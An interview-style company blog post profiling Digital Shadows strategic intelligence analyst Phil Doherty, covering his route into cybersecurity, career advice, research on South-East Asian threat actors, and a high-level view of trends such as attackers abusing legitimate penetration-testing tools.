Security Analyst Spotlight Series: Phil Doherty
January 10, 2019
Organizations rely on Digital Shadows to be an extension of their security team. Our global team of analysts provide relevant threat research, much needed context, tailored remediation advice and managed takedown support to make our clients’ jobs easier and more efficient. Crucially, by having analysts within the intelligence and collection cycle, we’re able to minimize the real-time false positives that cause nightmares for most organizations.
In our Security Analyst Spotlight Series, we bring our analysts out of the shadows and into the spotlight, showcasing their expertise and interests so you can learn a bit more about a “day-in-the-life” of a Digital Shadows analyst.
Name: Phil Doherty
Team: Strategic Intelligence
Title: Strategic Intelligence Analyst
How did you get into cybersecurity?
While studying Countering Organised Crime and Terrorism I noticed that one of the main drivers for both is the proliferation of digital platforms. I then took up a module on Cyber Security and thought it was fascinating! I think it was how cyber intelligence is so broad yet interconnected that really drew me. In my job I’m able to swing between analyzing low-level attacks that organizations and individuals experience on a daily basis, sophisticated nation-state campaigns, and also the financially motivated organised crime from my academic background.
Currently, I am studying for the CompTIA Sec+ certificate, Automating OSINT qualification and additional research for educational institutions on matters of counter-terrorism and open source procurement.
What advice would you give someone wanting to become an intelligence analyst?
For me, the most important thing is to have a genuine interest in what you are doing; intelligence work can be high intensity, so if you enjoy the subject, you’ll enjoy the work. You have to be ready to answer the “so what?” question with your research. Definitely read around the threat landscape and the major events that take place in the geographies and industries that interest you, trying to map the primary threat actors, their campaigns, and the techniques that they use.
What areas of cybersecurity are you most interested in and why?
Coming from an analytical background in criminology, I’ve always been drawn to the developments of organized crime and what drives it. When I started in cyber intelligence I loved mapping different threat actors and how they interlink on a local and national level. My interests also lie within geopolitics and how nation-state level associations affect both the physical and cyber threat landscape, so I do have a soft spot for military capabilities and state-level cyber attacks.
Recently I have focused on South-East Asia and China, and my research has centred on the proliferation of capabilities within this region. As the nations within this area are highly competitive against one another, there is likely an abundance of information yet to be unveiled about how threat actors collaborate. This region is highly volatile and shifting daily, which is something I love about the cyber-security industry as a whole.
What has been your favourite project or investigation to work on?
Fortunately, the role of an analyst opens you up to a variety of topics and investigations. My favourite has to be those that surround upcoming geopolitical events and international conferences. These events attract attention from a wide-range of threat actors, allowing me to both quantitatively and qualitatively assess the likelihood of these events – or specific attendees – being directly or indirectly targeted. One example was assessing the cyber threats to an international economics summit in Asia attended by the world’s largest financial institutions, corporations and government representatives.
Also, I enjoy tracking the developments of specific threat actors and building a profile of their tactics, techniques and procedures (TTPs). By tracing these threat actors, you can better understand how they choose their targets, what tactics they use, and what the real impact of their attacks are. This knowledge is invaluable during live investigations such as when a client receives a ransom demand and needs assistance verifying the actor’s capabilities before deciding on how to respond.
What are the most significant cybersecurity trends that organizations should be aware of?
As all cyber security experts are aware, vulnerabilities are used by threat actors to gain a foothold within a system and move laterally across the wider network. Individually, these vulnerabilities may appear low-level, but can often become incredibly serious when leveraged alongside others. Understanding what your most critical systems are, and where they are vulnerable, is key to deciding on what to prioritize from a patching perspective.
Recently there has been an increase in reports of threat actors using legitimate penetration-testing and administration utilities to escalate their privileges and access sensitive data. These utilities are particularly difficult to detect as anti-virus software often fails to report them as malicious because they are typically installed as default by the device-provider or have been designed by Red Teams to avoid detection. Businesses should pay close attention to these utilities and only use them if consistently necessary.
Both of the above can be used simultaneously to infect a system. The use of legitimate tools such as PowerShell Empire and Veil Framework, alongside system vulnerabilities, can be a significant risk to organizations given their widespread use. More should be done to ensure that these organizations have up-to-date systems and only use these tools if necessary.
Phil is a Strategic Intelligence Analyst within Digital Shadows’ Strategic Intelligence team, where he closely follows international threat developments in South-East Asia and China. He holds a BA in Criminology and Psychology from Leeds and an MSc in Countering Organised Crime and Terrorism from University College London.
To stay up to date with the latest digital risk and threat intelligence news, subscribe to our threat intelligence emails here.